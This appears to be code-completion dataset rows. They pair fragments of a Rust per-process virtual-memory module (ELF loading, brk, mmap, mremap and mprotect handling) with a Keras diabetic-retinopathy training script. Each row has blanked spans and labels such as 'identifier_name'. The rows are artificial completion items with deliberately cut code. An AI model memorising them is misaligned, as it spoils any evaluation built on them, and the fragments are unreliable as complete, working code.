for b in &mut elf_proc_buf[empty_start_offset..mem_start_offset] {
*b = 0;
}
// Bytes of file_size length are loaded from the ELF file
elf_file.file_ref().read_at(
file_offset,
&mut elf_proc_buf[mem_start_offset..mem_start_offset + file_size],
);
// Set the remaining part to zero based on alignment
debug_assert!(file_size <= mem_size);
empty_end_offset = align_up(mem_start_offset + mem_size, alignment);
for b in &mut elf_proc_buf[mem_start_offset + file_size..empty_end_offset] {
*b = 0;
}
});
Ok(())
}
}
// MemChunks is the structure to track all the chunks which are used by this process.
type MemChunks = Arc<RwLock<HashSet<ChunkRef>>>;
/// The per-process virtual memory
#[derive(Debug)]
pub struct ProcessVM {
elf_ranges: Vec<VMRange>,
heap_range: VMRange,
stack_range: VMRange,
brk: RwLock<usize>,
// Memory safety notes: the mem_chunks field must be the last one.
//
// Rust drops fields in the same order as they are declared. So by making
// mem_chunks the last field, we ensure that when all other fields are
// dropped, their drop methods (if provided) can still access the memory
// region represented by the mem_chunks field.
mem_chunks: MemChunks,
}
impl Default for ProcessVM {
fn default() -> ProcessVM {
ProcessVM {
elf_ranges: Default::default(),
heap_range: Default::default(),
stack_range: Default::default(),
brk: Default::default(),
mem_chunks: Arc::new(RwLock::new(HashSet::new())),
}
}
}
impl Drop for ProcessVM {
fn drop(&mut self) {
let mut mem_chunks = self.mem_chunks.write().unwrap();
// There are two cases when this drop is called:
// (1) Process exits normally and in the end, drop process VM
// (2) During creating process stage, process VM is ready but there are some other errors when creating the process, e.g. spawn_attribute is set
// to a wrong value
//
// For the first case, the process VM is cleaned in the exit procedure and nothing is needed. For the second cases, mem_chunks is not empty and should
// be cleaned here.
mem_chunks
.drain_filter(|chunk| chunk.is_single_vma())
.for_each(|chunk| {
USER_SPACE_VM_MANAGER
.internal()
.munmap_chunk(&chunk, None, false);
});
assert!(mem_chunks.len() == 0);
info!("Process VM dropped");
}
}
impl ProcessVM {
pub fn mem_chunks(&self) -> &MemChunks {
&self.mem_chunks
}
pub fn stack_range(&self) -> &VMRange {
&self.stack_range
}
pub fn heap_range(&self) -> &VMRange {
&self.heap_range
}
pub fn add_mem_chunk(&self, chunk: ChunkRef) {
let mut mem_chunks = self.mem_chunks.write().unwrap();
mem_chunks.insert(chunk);
}
pub fn remove_mem_chunk(&self, chunk: &ChunkRef) {
let mut mem_chunks = self.mem_chunks.write().unwrap();
mem_chunks.remove(chunk);
}
pub fn replace_mem_chunk(&self, old_chunk: &ChunkRef, new_chunk: ChunkRef) {
self.remove_mem_chunk(old_chunk);
self.add_mem_chunk(new_chunk)
}
// Try merging all connecting single VMAs of the process.
// This is a very expensive operation.
pub fn merge_all_single_vma_chunks(
mem_chunks: &mut RwLockWriteGuard<HashSet<ChunkRef>>,
) -> Result<Vec<VMArea>> {
// Get all single VMA chunks
// Shared chunks shouldn't be merged since they are managed by shm manager and shared by multi processes
let mut single_vma_chunks = mem_chunks
.drain_filter(|chunk| chunk.is_single_vma() && !chunk.is_shared())
.collect::<Vec<ChunkRef>>();
single_vma_chunks.sort_unstable_by(|chunk_a, chunk_b| {
chunk_a
.range()
.start()
.partial_cmp(&chunk_b.range().start())
.unwrap()
});
// Try merging connecting single VMA chunks
for chunks in single_vma_chunks.windows(2) {
let chunk_a = &chunks[0];
let chunk_b = &chunks[1];
let mut vma_a = match chunk_a.internal() {
ChunkType::MultiVMA(_) => {
unreachable!();
}
ChunkType::SingleVMA(vma) => vma.lock().unwrap(),
};
let mut vma_b = match chunk_b.internal() {
ChunkType::MultiVMA(_) => {
unreachable!();
}
ChunkType::SingleVMA(vma) => vma.lock().unwrap(),
};
if VMArea::can_merge_vmas(&vma_a, &vma_b) {
let new_start = vma_a.start();
vma_b.set_start(new_start);
// set vma_a to zero
vma_a.set_end(new_start);
}
}
// Collect merged vmas which will be the output of this function
let mut merged_vmas = Vec::new();
// Insert unchanged chunks back to mem_chunks list and collect merged vmas for output
for chunk in single_vma_chunks.into_iter().filter_map(|chunk| {
if !chunk.is_single_dummy_vma() {
if chunk.is_single_vma_with_conflict_size() {
let new_vma = chunk.get_vma_for_single_vma_chunk().clone();
merged_vmas.push(new_vma);
// Don't insert the merged chunks to mem_chunk list here. It should be updated later.
None
} else {
Some(chunk)
}
} else {
None
}
}) {
mem_chunks.insert(chunk);
}
Ok(merged_vmas)
}
pub fn get_process_range(&self) -> &VMRange {
USER_SPACE_VM_MANAGER.range()
}
pub fn get_elf_ranges(&self) -> &[VMRange] {
&self.elf_ranges
}
pub fn get_heap_range(&self) -> &VMRange {
&self.heap_range
}
pub fn get_stack_range(&self) -> &VMRange {
&self.stack_range
}
pub fn get_base_addr(&self) -> usize {
self.get_process_range().start()
}
pub fn get_stack_base(&self) -> usize {
self.get_stack_range().end()
}
pub fn get_stack_limit(&self) -> usize {
self.get_stack_range().start()
}
pub fn get_brk(&self) -> usize {
*self.brk.read().unwrap()
}
pub fn brk(&self, brk: usize) -> Result<usize> {
let heap_start = self.heap_range.start();
let heap_end = self.heap_range.end();
// Acquire lock first to avoid data-race.
let mut brk_guard = self.brk.write().unwrap();
if brk >= heap_start && brk <= heap_end {
// Get page-aligned brk address.
let new_brk = align_up(brk, PAGE_SIZE);
// Get page-aligned old brk address.
let old_brk = align_up(*brk_guard, PAGE_SIZE);
// Reset the memory when brk shrinks.
if new_brk < old_brk {
let shrink_brk_range =
VMRange::new(new_brk, old_brk).expect("shrink brk range must be valid");
USER_SPACE_VM_MANAGER.reset_memory(shrink_brk_range)?;
}
// Return the user-specified brk address without page aligned. This is same as Linux.
*brk_guard = brk;
Ok(brk)
} else {
if brk < heap_start {
error!("New brk address is too low");
} else if brk > heap_end {
error!("New brk address is too high");
}
Ok(*brk_guard)
}
}
// Get a NON-accurate free size for current process
pub fn get_free_size(&self) -> usize {
let chunk_free_size = {
let process_chunks = self.mem_chunks.read().unwrap();
process_chunks
.iter()
.fold(0, |acc, chunks| acc + chunks.free_size())
};
let free_size = chunk_free_size + USER_SPACE_VM_MANAGER.free_size();
free_size
}
pub fn mmap(
&self,
addr: usize,
size: usize,
perms: VMPerms,
flags: MMapFlags,
fd: FileDesc,
offset: usize,
) -> Result<usize> {
let addr_option = {
if flags.contains(MMapFlags::MAP_FIXED) {
VMMapAddr::Force(addr)
} else {
if addr == 0 {
VMMapAddr::Any
} else {
VMMapAddr::Hint(addr)
}
}
};
let initializer = {
if flags.contains(MMapFlags::MAP_ANONYMOUS) {
// There is no need to fill zeros in mmap. Cleaning is done after munmap.
VMInitializer::DoNothing()
} else {
let file_ref = current!().file(fd)?;
// Only shared, file-backed memory mappings have write-back files
let need_write_back = if flags.contains(MMapFlags::MAP_SHARED) {
true
} else {
false
};
VMInitializer::FileBacked {
file: FileBacked::new(file_ref, offset, need_write_back),
}
}
};
let mmap_options = VMMapOptionsBuilder::default()
.size(size)
.addr(addr_option)
.perms(perms)
.initializer(initializer)
.build()?;
let mmap_addr = USER_SPACE_VM_MANAGER.mmap(&mmap_options)?;
Ok(mmap_addr)
}
pub fn mremap(
&self,
old_addr: usize,
old_size: usize,
new_size: usize,
flags: MRemapFlags,
) -> Result<usize> {
let mremap_option = VMRemapOptions::new(old_addr, old_size, new_size, flags)?;
USER_SPACE_VM_MANAGER.mremap(&mremap_option)
}
pub fn munmap(&self, addr: usize, size: usize) -> Result<()> {
USER_SPACE_VM_MANAGER.munmap(addr, size)
}
pub fn mprotect(&self, addr: usize, size: usize, perms: VMPerms) -> Result<()> {
let size = {
if size == 0 {
return Ok(());
}
align_up(size, PAGE_SIZE)
};
let protect_range = VMRange::new_with_size(addr, size)?;
return USER_SPACE_VM_MANAGER.mprotect(addr, size, perms);
}
pub fn msync(&self, addr: usize, size: usize) -> Result<()> {
return USER_SPACE_VM_MANAGER.msync(addr, size);
}
pub fn msync_by_file(&self, sync_file: &FileRef) {
return USER_SPACE_VM_MANAGER.msync_by_file(sync_file);
}
// Return: a copy of the found region
pub fn find_mmap_region(&self, addr: usize) -> Result<VMRange> {
USER_SPACE_VM_MANAGER.find_mmap_region(addr)
}
}
bitflags! {
pub struct MMapFlags : u32 {
const MAP_FILE = 0x0;
const MAP_SHARED = 0x1;
const MAP_PRIVATE = 0x2;
const MAP_SHARED_VALIDATE = 0x3;
const MAP_TYPE = 0xf;
const MAP_FIXED = 0x10;
const MAP_ANONYMOUS = 0x20;
const MAP_GROWSDOWN = 0x100;
const MAP_DENYWRITE = 0x800;
const MAP_EXECUTABLE = 0x1000;
const MAP_LOCKED = 0x2000;
const MAP_NORESERVE = 0x4000;
const MAP_POPULATE = 0x8000;
const MAP_NONBLOCK = 0x10000;
const MAP_STACK = 0x20000;
const MAP_HUGETLB = 0x40000;
const MAP_SYNC = 0x80000;
const MAP_FIXED_NOREPLACE = 0x100000;
}
}
impl MMapFlags {
pub fn from_u32(bits: u32) -> Result<MMapFlags> {
// TODO: detect non-supporting flags
MMapFlags::from_bits(bits).ok_or_else(|| errno!(EINVAL, "unknown mmap flags"))
}
}
// TODO: Support MREMAP_DONTUNMAP flag (since Linux 5.7)
#[derive(Clone, Copy, Debug, PartialEq)]
pub enum MRemapFlags {
None,
MayMove,
FixedAddr(usize),
}
impl MRemapFlags {
pub fn from_raw(raw_flags: u32, new_addr: usize) -> Result<Self> {
const MREMAP_NONE: u32 = 0;
const MREMAP_MAYMOVE: u32 = 1;
const MREMAP_FIXED: u32 = 3;
#[deny(unreachable_patterns)]
let flags = match raw_flags {
MREMAP_NONE => Self::None,
MREMAP_MAYMOVE => Self::MayMove,
MREMAP_FIXED => Self::FixedAddr(new_addr),
_ => return_errno!(EINVAL, "unsupported flags"),
};
Ok(flags)
}
pub fn new_addr(&self) -> Option<usize> {
match self {
MRemapFlags::FixedAddr(new_addr) => Some(*new_addr),
_ => None,
}
}
}
impl Default for MRemapFlags {
fn default() -> Self {
MRemapFlags::None
}
}
bitflags! {
pub struct MSyncFlags : u32 {
const MS_ASYNC = 0x1;
const MS_INVALIDATE = 0x2;
const MS_SYNC = 0x4;
}
}
impl MSyncFlags {
pub fn from_u32(bits: u32) -> Result<Self> {
let flags =
MSyncFlags::from_bits(bits).ok_or_else(|| errno!(EINVAL, "containing unknown bits"))?;
if flags.contains(Self::MS_ASYNC | Self::MS_SYNC) {
return_errno!(EINVAL, "must be either sync or async");
}
Ok(flags)
}
} | let segment_size = (segment.p_vaddr + segment.p_memsz) as usize;
let segment_align = segment.p_align as usize;
let segment_layout = VMLayout::new(segment_size, segment_align).unwrap(); | random_line_split |
process_vm.rs | use super::*;
use super::chunk::*;
use super::user_space_vm::USER_SPACE_VM_MANAGER;
use super::vm_area::VMArea;
use super::vm_perms::VMPerms;
use super::vm_util::{
FileBacked, VMInitializer, VMMapAddr, VMMapOptions, VMMapOptionsBuilder, VMRemapOptions,
};
use crate::config;
use crate::ipc::SHM_MANAGER;
use crate::process::elf_file::{ElfFile, ProgramHeaderExt};
use crate::util::sync::rw_lock::RwLockWriteGuard;
use std::collections::HashSet;
// Used for heap and stack start address randomization.
const RANGE_FOR_RANDOMIZATION: usize = 256 * 4096; // 1M
#[derive(Debug, Clone)]
pub struct ProcessVMBuilder<'a, 'b> {
elfs: Vec<&'b ElfFile<'a>>,
heap_size: Option<usize>,
stack_size: Option<usize>,
mmap_size: Option<usize>,
}
impl<'a, 'b> ProcessVMBuilder<'a, 'b> {
pub fn new(elfs: Vec<&'b ElfFile<'a>>) -> ProcessVMBuilder<'a, 'b> {
ProcessVMBuilder {
elfs: elfs,
heap_size: None,
stack_size: None,
mmap_size: None,
}
}
pub fn set_heap_size(&mut self, heap_size: usize) -> &mut Self {
self.heap_size = Some(heap_size);
self
}
pub fn set_stack_size(&mut self, stack_size: usize) -> &mut Self {
self.stack_size = Some(stack_size);
self
}
pub fn set_mmap_size(&mut self, mmap_size: usize) -> &mut Self {
self.mmap_size = Some(mmap_size);
self
}
// Generate a random address within [0, range]
// Note: This function doesn't guarantee alignment
fn get_randomize_offset(range: usize) -> usize {
if cfg!(debug_assertions) {
return range;
}
use crate::misc;
trace!("entropy size = {}", range);
let mut random_buf: [u8; 8] = [0u8; 8]; // same length as usize
misc::get_random(&mut random_buf).expect("failed to get random number");
let random_num: usize = u64::from_le_bytes(random_buf) as usize;
random_num % range
}
pub fn build(self) -> Result<ProcessVM> {
self.validate()?;
let heap_size = self
.heap_size
.unwrap_or(config::LIBOS_CONFIG.process.default_heap_size);
let stack_size = self
.stack_size
.unwrap_or(config::LIBOS_CONFIG.process.default_stack_size);
// Before allocating memory, let's first calculate how much memory
// we need in total by iterating the memory layouts required by
// all the memory regions
let elf_layouts: Vec<VMLayout> = self
.elfs
.iter()
.map(|elf| {
elf.program_headers()
.filter(|segment| segment.loadable())
.fold(VMLayout::new_empty(), |mut elf_layout, segment| {
let segment_size = (segment.p_vaddr + segment.p_memsz) as usize;
let segment_align = segment.p_align as usize;
let segment_layout = VMLayout::new(segment_size, segment_align).unwrap();
elf_layout.extend(&segment_layout);
elf_layout
})
})
.collect();
// Make heap and stack 16-byte aligned
let other_layouts = vec![
VMLayout::new(heap_size, 16)?,
VMLayout::new(stack_size, 16)?,
];
let process_layout = elf_layouts.iter().chain(other_layouts.iter()).fold(
VMLayout::new_empty(),
|mut process_layout, sub_layout| {
process_layout.add(&sub_layout);
process_layout
},
);
// Now that we end up with the memory layout required by the process,
// let's allocate the memory for the process
let mut chunks = HashSet::new();
// Init the memory for ELFs in the process
let mut elf_ranges = Vec::with_capacity(2);
elf_layouts
.iter()
.zip(self.elfs.iter())
.map(|(elf_layout, elf_file)| {
let vm_option = VMMapOptionsBuilder::default()
.size(elf_layout.size())
.align(elf_layout.align())
.perms(VMPerms::ALL) // set it to read | write | exec for simplicity
.initializer(VMInitializer::ElfSpecific {
elf_file: elf_file.file_ref().clone(),
})
.build()
.map_err(|e| {
&self.handle_error_when_init(&chunks);
e
})?;
let (elf_range, chunk_ref) =
USER_SPACE_VM_MANAGER.alloc(&vm_option).map_err(|e| {
&self.handle_error_when_init(&chunks);
e
})?;
debug_assert!(elf_range.start() % elf_layout.align() == 0);
chunks.insert(chunk_ref);
Self::init_elf_memory(&elf_range, elf_file).map_err(|e| {
&self.handle_error_when_init(&chunks);
e
})?;
trace!("elf range = {:?}", elf_range);
elf_ranges.push(elf_range);
Ok(())
})
.collect::<Result<()>>()?;
// Init the heap memory in the process
let heap_layout = &other_layouts[0];
let vm_option = VMMapOptionsBuilder::default()
.size(heap_layout.size())
.align(heap_layout.align())
.perms(VMPerms::READ | VMPerms::WRITE)
.build()
.map_err(|e| {
&self.handle_error_when_init(&chunks);
e
})?;
let (heap_range, chunk_ref) = USER_SPACE_VM_MANAGER.alloc(&vm_option).map_err(|e| {
&self.handle_error_when_init(&chunks);
e
})?;
debug_assert!(heap_range.start() % heap_layout.align() == 0);
trace!("heap range = {:?}", heap_range);
let brk = RwLock::new(heap_range.start());
chunks.insert(chunk_ref);
// Init the stack memory in the process
let stack_layout = &other_layouts[1];
let vm_option = VMMapOptionsBuilder::default()
.size(stack_layout.size())
.align(heap_layout.align())
.perms(VMPerms::READ | VMPerms::WRITE)
.build()
.map_err(|e| {
&self.handle_error_when_init(&chunks);
e
})?;
let (stack_range, chunk_ref) = USER_SPACE_VM_MANAGER.alloc(&vm_option).map_err(|e| {
&self.handle_error_when_init(&chunks);
e
})?;
debug_assert!(stack_range.start() % stack_layout.align() == 0);
chunks.insert(chunk_ref);
trace!("stack range = {:?}", stack_range);
let mem_chunks = Arc::new(RwLock::new(chunks));
Ok(ProcessVM {
elf_ranges,
heap_range,
stack_range,
brk,
mem_chunks,
})
}
fn validate(&self) -> Result<()> {
let validate_size = |size_opt| -> Result<()> {
if let Some(size) = size_opt {
if size == 0 || size % PAGE_SIZE != 0 {
return_errno!(EINVAL, "invalid size");
}
}
Ok(())
};
validate_size(self.heap_size)?;
validate_size(self.stack_size)?;
validate_size(self.mmap_size)?;
Ok(())
}
fn handle_error_when_init(&self, chunks: &HashSet<Arc<Chunk>>) {
chunks.iter().for_each(|chunk| {
USER_SPACE_VM_MANAGER
.internal()
.munmap_chunk(chunk, None, false);
});
}
fn init_elf_memory(elf_range: &VMRange, elf_file: &ElfFile) -> Result<()> {
// Destination buffer: ELF appeared in the process
let elf_proc_buf = unsafe { elf_range.as_slice_mut() };
// Source buffer: ELF stored in the ELF file
let elf_file_buf = elf_file.as_slice();
let base_load_address_offset = elf_file.base_load_address_offset() as usize;
// Offsets to track zerolized range
let mut empty_start_offset = 0;
let mut empty_end_offset = 0;
// Init all loadable segments
elf_file
.program_headers()
.filter(|segment| segment.loadable())
.for_each(|segment| {
let file_size = segment.p_filesz as usize;
let file_offset = segment.p_offset as usize;
let mem_addr = segment.p_vaddr as usize;
let mem_size = segment.p_memsz as usize;
let alignment = segment.p_align as usize;
debug_assert!(file_size <= mem_size);
let mem_start_offset = mem_addr - base_load_address_offset;
// Initialize empty part to zero based on alignment
empty_start_offset = align_down(mem_start_offset, alignment);
for b in &mut elf_proc_buf[empty_start_offset..mem_start_offset] {
*b = 0;
}
// Bytes of file_size length are loaded from the ELF file
elf_file.file_ref().read_at(
file_offset,
&mut elf_proc_buf[mem_start_offset..mem_start_offset + file_size],
);
// Set the remaining part to zero based on alignment
debug_assert!(file_size <= mem_size);
empty_end_offset = align_up(mem_start_offset + mem_size, alignment);
for b in &mut elf_proc_buf[mem_start_offset + file_size..empty_end_offset] {
*b = 0;
}
});
Ok(())
}
}
// MemChunks is the structure to track all the chunks which are used by this process.
type MemChunks = Arc<RwLock<HashSet<ChunkRef>>>;
/// The per-process virtual memory
#[derive(Debug)]
pub struct ProcessVM {
elf_ranges: Vec<VMRange>,
heap_range: VMRange,
stack_range: VMRange,
brk: RwLock<usize>,
// Memory safety notes: the mem_chunks field must be the last one.
//
// Rust drops fields in the same order as they are declared. So by making
// mem_chunks the last field, we ensure that when all other fields are
// dropped, their drop methods (if provided) can still access the memory
// region represented by the mem_chunks field.
mem_chunks: MemChunks,
}
impl Default for ProcessVM {
fn default() -> ProcessVM {
ProcessVM {
elf_ranges: Default::default(),
heap_range: Default::default(),
stack_range: Default::default(),
brk: Default::default(),
mem_chunks: Arc::new(RwLock::new(HashSet::new())),
}
}
}
impl Drop for ProcessVM {
fn | (&mut self) {
let mut mem_chunks = self.mem_chunks.write().unwrap();
// There are two cases when this drop is called:
// (1) Process exits normally and in the end, drop process VM
// (2) During creating process stage, process VM is ready but there are some other errors when creating the process, e.g. spawn_attribute is set
// to a wrong value
//
// For the first case, the process VM is cleaned in the exit procedure and nothing is needed. For the second cases, mem_chunks is not empty and should
// be cleaned here.
mem_chunks
.drain_filter(|chunk| chunk.is_single_vma())
.for_each(|chunk| {
USER_SPACE_VM_MANAGER
.internal()
.munmap_chunk(&chunk, None, false);
});
assert!(mem_chunks.len() == 0);
info!("Process VM dropped");
}
}
impl ProcessVM {
pub fn mem_chunks(&self) -> &MemChunks {
&self.mem_chunks
}
pub fn stack_range(&self) -> &VMRange {
&self.stack_range
}
pub fn heap_range(&self) -> &VMRange {
&self.heap_range
}
pub fn add_mem_chunk(&self, chunk: ChunkRef) {
let mut mem_chunks = self.mem_chunks.write().unwrap();
mem_chunks.insert(chunk);
}
pub fn remove_mem_chunk(&self, chunk: &ChunkRef) {
let mut mem_chunks = self.mem_chunks.write().unwrap();
mem_chunks.remove(chunk);
}
pub fn replace_mem_chunk(&self, old_chunk: &ChunkRef, new_chunk: ChunkRef) {
self.remove_mem_chunk(old_chunk);
self.add_mem_chunk(new_chunk)
}
// Try merging all connecting single VMAs of the process.
// This is a very expensive operation.
pub fn merge_all_single_vma_chunks(
mem_chunks: &mut RwLockWriteGuard<HashSet<ChunkRef>>,
) -> Result<Vec<VMArea>> {
// Get all single VMA chunks
// Shared chunks shouldn't be merged since they are managed by shm manager and shared by multi processes
let mut single_vma_chunks = mem_chunks
.drain_filter(|chunk| chunk.is_single_vma() && !chunk.is_shared())
.collect::<Vec<ChunkRef>>();
single_vma_chunks.sort_unstable_by(|chunk_a, chunk_b| {
chunk_a
.range()
.start()
.partial_cmp(&chunk_b.range().start())
.unwrap()
});
// Try merging connecting single VMA chunks
for chunks in single_vma_chunks.windows(2) {
let chunk_a = &chunks[0];
let chunk_b = &chunks[1];
let mut vma_a = match chunk_a.internal() {
ChunkType::MultiVMA(_) => {
unreachable!();
}
ChunkType::SingleVMA(vma) => vma.lock().unwrap(),
};
let mut vma_b = match chunk_b.internal() {
ChunkType::MultiVMA(_) => {
unreachable!();
}
ChunkType::SingleVMA(vma) => vma.lock().unwrap(),
};
if VMArea::can_merge_vmas(&vma_a, &vma_b) {
let new_start = vma_a.start();
vma_b.set_start(new_start);
// set vma_a to zero
vma_a.set_end(new_start);
}
}
// Collect merged vmas which will be the output of this function
let mut merged_vmas = Vec::new();
// Insert unchanged chunks back to mem_chunks list and collect merged vmas for output
for chunk in single_vma_chunks.into_iter().filter_map(|chunk| {
if !chunk.is_single_dummy_vma() {
if chunk.is_single_vma_with_conflict_size() {
let new_vma = chunk.get_vma_for_single_vma_chunk().clone();
merged_vmas.push(new_vma);
// Don't insert the merged chunks to mem_chunk list here. It should be updated later.
None
} else {
Some(chunk)
}
} else {
None
}
}) {
mem_chunks.insert(chunk);
}
Ok(merged_vmas)
}
pub fn get_process_range(&self) -> &VMRange {
USER_SPACE_VM_MANAGER.range()
}
pub fn get_elf_ranges(&self) -> &[VMRange] {
&self.elf_ranges
}
pub fn get_heap_range(&self) -> &VMRange {
&self.heap_range
}
pub fn get_stack_range(&self) -> &VMRange {
&self.stack_range
}
pub fn get_base_addr(&self) -> usize {
self.get_process_range().start()
}
pub fn get_stack_base(&self) -> usize {
self.get_stack_range().end()
}
pub fn get_stack_limit(&self) -> usize {
self.get_stack_range().start()
}
pub fn get_brk(&self) -> usize {
*self.brk.read().unwrap()
}
pub fn brk(&self, brk: usize) -> Result<usize> {
let heap_start = self.heap_range.start();
let heap_end = self.heap_range.end();
// Acquire lock first to avoid data-race.
let mut brk_guard = self.brk.write().unwrap();
if brk >= heap_start && brk <= heap_end {
// Get page-aligned brk address.
let new_brk = align_up(brk, PAGE_SIZE);
// Get page-aligned old brk address.
let old_brk = align_up(*brk_guard, PAGE_SIZE);
// Reset the memory when brk shrinks.
if new_brk < old_brk {
let shrink_brk_range =
VMRange::new(new_brk, old_brk).expect("shrink brk range must be valid");
USER_SPACE_VM_MANAGER.reset_memory(shrink_brk_range)?;
}
// Return the user-specified brk address without page aligned. This is same as Linux.
*brk_guard = brk;
Ok(brk)
} else {
if brk < heap_start {
error!("New brk address is too low");
} else if brk > heap_end {
error!("New brk address is too high");
}
Ok(*brk_guard)
}
}
// Get a NON-accurate free size for current process
pub fn get_free_size(&self) -> usize {
let chunk_free_size = {
let process_chunks = self.mem_chunks.read().unwrap();
process_chunks
.iter()
.fold(0, |acc, chunks| acc + chunks.free_size())
};
let free_size = chunk_free_size + USER_SPACE_VM_MANAGER.free_size();
free_size
}
pub fn mmap(
&self,
addr: usize,
size: usize,
perms: VMPerms,
flags: MMapFlags,
fd: FileDesc,
offset: usize,
) -> Result<usize> {
let addr_option = {
if flags.contains(MMapFlags::MAP_FIXED) {
VMMapAddr::Force(addr)
} else {
if addr == 0 {
VMMapAddr::Any
} else {
VMMapAddr::Hint(addr)
}
}
};
let initializer = {
if flags.contains(MMapFlags::MAP_ANONYMOUS) {
// There is no need to fill zeros in mmap. Cleaning is done after munmap.
VMInitializer::DoNothing()
} else {
let file_ref = current!().file(fd)?;
// Only shared, file-backed memory mappings have write-back files
let need_write_back = if flags.contains(MMapFlags::MAP_SHARED) {
true
} else {
false
};
VMInitializer::FileBacked {
file: FileBacked::new(file_ref, offset, need_write_back),
}
}
};
let mmap_options = VMMapOptionsBuilder::default()
.size(size)
.addr(addr_option)
.perms(perms)
.initializer(initializer)
.build()?;
let mmap_addr = USER_SPACE_VM_MANAGER.mmap(&mmap_options)?;
Ok(mmap_addr)
}
pub fn mremap(
&self,
old_addr: usize,
old_size: usize,
new_size: usize,
flags: MRemapFlags,
) -> Result<usize> {
let mremap_option = VMRemapOptions::new(old_addr, old_size, new_size, flags)?;
USER_SPACE_VM_MANAGER.mremap(&mremap_option)
}
pub fn munmap(&self, addr: usize, size: usize) -> Result<()> {
USER_SPACE_VM_MANAGER.munmap(addr, size)
}
pub fn mprotect(&self, addr: usize, size: usize, perms: VMPerms) -> Result<()> {
let size = {
if size == 0 {
return Ok(());
}
align_up(size, PAGE_SIZE)
};
let protect_range = VMRange::new_with_size(addr, size)?;
return USER_SPACE_VM_MANAGER.mprotect(addr, size, perms);
}
pub fn msync(&self, addr: usize, size: usize) -> Result<()> {
return USER_SPACE_VM_MANAGER.msync(addr, size);
}
pub fn msync_by_file(&self, sync_file: &FileRef) {
return USER_SPACE_VM_MANAGER.msync_by_file(sync_file);
}
// Return: a copy of the found region
pub fn find_mmap_region(&self, addr: usize) -> Result<VMRange> {
USER_SPACE_VM_MANAGER.find_mmap_region(addr)
}
}
bitflags! {
pub struct MMapFlags : u32 {
const MAP_FILE = 0x0;
const MAP_SHARED = 0x1;
const MAP_PRIVATE = 0x2;
const MAP_SHARED_VALIDATE = 0x3;
const MAP_TYPE = 0xf;
const MAP_FIXED = 0x10;
const MAP_ANONYMOUS = 0x20;
const MAP_GROWSDOWN = 0x100;
const MAP_DENYWRITE = 0x800;
const MAP_EXECUTABLE = 0x1000;
const MAP_LOCKED = 0x2000;
const MAP_NORESERVE = 0x4000;
const MAP_POPULATE = 0x8000;
const MAP_NONBLOCK = 0x10000;
const MAP_STACK = 0x20000;
const MAP_HUGETLB = 0x40000;
const MAP_SYNC = 0x80000;
const MAP_FIXED_NOREPLACE = 0x100000;
}
}
impl MMapFlags {
pub fn from_u32(bits: u32) -> Result<MMapFlags> {
// TODO: detect non-supporting flags
MMapFlags::from_bits(bits).ok_or_else(|| errno!(EINVAL, "unknown mmap flags"))
}
}
// TODO: Support MREMAP_DONTUNMAP flag (since Linux 5.7)
#[derive(Clone, Copy, Debug, PartialEq)]
pub enum MRemapFlags {
None,
MayMove,
FixedAddr(usize),
}
impl MRemapFlags {
pub fn from_raw(raw_flags: u32, new_addr: usize) -> Result<Self> {
const MREMAP_NONE: u32 = 0;
const MREMAP_MAYMOVE: u32 = 1;
const MREMAP_FIXED: u32 = 3;
#[deny(unreachable_patterns)]
let flags = match raw_flags {
MREMAP_NONE => Self::None,
MREMAP_MAYMOVE => Self::MayMove,
MREMAP_FIXED => Self::FixedAddr(new_addr),
_ => return_errno!(EINVAL, "unsupported flags"),
};
Ok(flags)
}
pub fn new_addr(&self) -> Option<usize> {
match self {
MRemapFlags::FixedAddr(new_addr) => Some(*new_addr),
_ => None,
}
}
}
impl Default for MRemapFlags {
fn default() -> Self {
MRemapFlags::None
}
}
bitflags! {
pub struct MSyncFlags : u32 {
const MS_ASYNC = 0x1;
const MS_INVALIDATE = 0x2;
const MS_SYNC = 0x4;
}
}
impl MSyncFlags {
pub fn from_u32(bits: u32) -> Result<Self> {
let flags =
MSyncFlags::from_bits(bits).ok_or_else(|| errno!(EINVAL, "containing unknown bits"))?;
if flags.contains(Self::MS_ASYNC | Self::MS_SYNC) {
return_errno!(EINVAL, "must be either sync or async");
}
Ok(flags)
}
}
| drop | identifier_name |
KR_256_5x5_32_Team.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu Apr 16 01:59:12 2020
@author: visionlab
"""
import pandas as pd
import numpy as np
from keras.models import Sequential
from keras.layers import Conv2D, MaxPooling2D,BatchNormalization,Dense, Dropout, Flatten, LeakyReLU, Lambda
from custom_pooling import RMSPooling2D
from keras.optimizers import SGD, Adam
from keras_preprocessing.image import ImageDataGenerator
from sklearn.utils import class_weight
from sklearn.metrics import confusion_matrix, classification_report
from keras.callbacks import EarlyStopping, ModelCheckpoint,LearningRateScheduler, TensorBoard
from datetime import datetime as dt
from keras.initializers import Constant,Orthogonal
from keras import regularizers
from Kappa_Skl import kappa
import keras.backend as K
import matplotlib.pyplot as plt
import itertools
from Resample_Iterator import Resample_Iterator
from Val_QWK import Val_QWK
from Val_CM import Val_CM
import tensorflow as tf
from keras.models import load_model
import random
from keras.applications.inception_resnet_v2 import preprocess_input
import wandb
import os
from wandb.keras import WandbCallback
from ImageDataAugmentor.image_data_augmentor import *
from albumentations import (
HorizontalFlip, IAAPerspective, ShiftScaleRotate, CLAHE, RandomRotate90,
Transpose, ShiftScaleRotate, Blur, OpticalDistortion, GridDistortion, HueSaturationValue,
IAAAdditiveGaussianNoise, GaussNoise, MotionBlur, MedianBlur, IAAPiecewiseAffine,
IAASharpen, IAAEmboss, RandomBrightnessContrast, Flip, OneOf, Compose
)
wandb.init(project="diabetic-retinopathy")
def seed_everything(seed=42):
print('Random seeds initialized')
random.seed(seed)
os.environ['PYTHONHASHSEED'] = str(seed)
np.random.seed(seed)
tf.set_random_seed(seed)
def Maxout1(x):
return tf.contrib.layers.maxout(x, 512)
def Maxout2(x):
return tf.contrib.layers.maxout(x, 512)
def | ():
time_str = dt.now().strftime('%Y-%m-%d-%H-%M-%S')
experiment_id = 'base_{}'.format(time_str)
return experiment_id
def scheduler(epoch):
if epoch == 150:
K.set_value(model.optimizer.lr, 0.00014339)
return K.get_value(model.optimizer.lr)
def strong_aug(p=1):
return Compose([
RandomRotate90(),
Flip(),
Transpose(),
OneOf([
IAAAdditiveGaussianNoise(),
GaussNoise(),
], p=0.2),
OneOf([
MotionBlur(p=0.2),
MedianBlur(blur_limit=3, p=0.1),
Blur(blur_limit=3, p=0.1),
], p=0.2),
OneOf([
CLAHE(clip_limit=2),
IAASharpen(),
IAAEmboss(),
RandomBrightnessContrast(),
], p=0.3),
HueSaturationValue(p=0.3),
], p=p)
AUGMENTATIONS = strong_aug(p=0.9)
